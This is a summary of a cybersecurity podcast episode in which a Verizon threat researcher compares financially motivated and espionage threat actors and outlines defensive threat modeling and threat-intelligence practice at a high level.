In episode 45 of The Cyber5, we are joined by John Grim. John is the head of research, development, and innovation for Verizon’s Threat Research Advisory Center. In this episode, we discuss the differences between threat actors who engage in cybercrime and those who are nation state espionage actors. We explore their motivations around computer network exploitation and how threat models on these actors need to adapt to enterprise security and IT.

5 Topics Covered in this Episode:

1. Motivations of Cyber Crime versus Espionage Actors: (01:30 - 08:00)

According to a study conducted by Verizon in late 2020, over a seven year period, financially motivated threat actors were responsible for 76% of breaches, whereas espionage actors were responsible for 18% of breaches. PCI attacks, business email compromise, and fraud (such as COVID-19 scams) were more prevalent than advanced attacks. Of those 18% of breaches perpetrated by espionage actors, 57% of the time, manufacturing, mining, utilities, and the public sector were the largest industries dealing with espionage threat actors. However, financial, insurance, retail, and healthcare are mostly targeted by financial organized crime actors. The vectors most used by either organization (nation state or crime) were social engineering attacks through phishing and credential thefts, as well as backdoor access through applications. A big difference, however, is that in most espionage cases, native Windows command techniques such as “living on the land” (LOL) were used to avoid being detected in log entries. These are pre-installed system tools to spread malware.

2. Defending Against Cyber Crime and Espionage for the CISO: Understanding Environment and Threat Modeling (08:00 - 12:16)

The number one discovery method for breaches, according to Verizon, was investigating suspicious traffic. A two part, multi-step strategy should be implemented to protect crown jewels and alert on suspicious traffic. The first is understanding your own environment:

Step 1) Identify critical data and the assets that hold that data and

Step 2) Ensure network devices are configured and patched properly and

Step 3) Restrict access.

Defenders need to understand and have the proper tooling that flags anomalies in suspicious traffic especially when so much of it could be native Windows commands in the environment (LOL).

The second part of this strategy is conducting threat modeling against the threat actors that are likely to attack your environment and leverage intelligence sources to build proper defenses and controls.

3. Evolution of Threat Intelligence Driving Investigations: (12:16 - 15:30)

In the last five years, threat intel has evolved:

4. In the early days of threat intelligence, forensic artifacts (known as indicators of compromise) were shared to tip off network defenders of known signatures of an attacker present in an organization’s environment.
5. Tactics, techniques, and procedures outside of an organization’s environment being actively shared to give context on the modus operandi of the attackers. Dark web and open source threat hunters going outside the wire to gather information that could be used in a breach.
6. Intel effectively drives the investigation that prevents an incident from becoming a breach.

4. Threat Models Differ from Cyber Crime and Espionage But They are Similar: (18:47 - 21:00)

In espionage attacks, desktops, laptops, and mobile phones are the assets that are targeted most often. For financially motivated attackers, the assets targeted vary tremendously including web applications servers, customers, customer devices, and employee devices previously mentioned. To compromise the integrity of data systems, targeting software installation (such as Solarwinds third party) was the number one attribute of financial and espionage actors. Secure configurations of software, hardware, applications, and network devices are the most important remediation efforts.

5. Embracing Business Terms Important to CEOs and Executive Leaders: (21:00 - 26:00)

Security leaders need to write reports and convey technical findings in terms of risk to the business to generate revenue. While data breaches have become more complex over the years, they are more complex to the stakeholders outside of security and IT, particularly HR, legal, and Finance. Breaking down technical findings and capabilities to various threat actors to make sense to different levels of the business is the biggest adjustment needed to the security industry.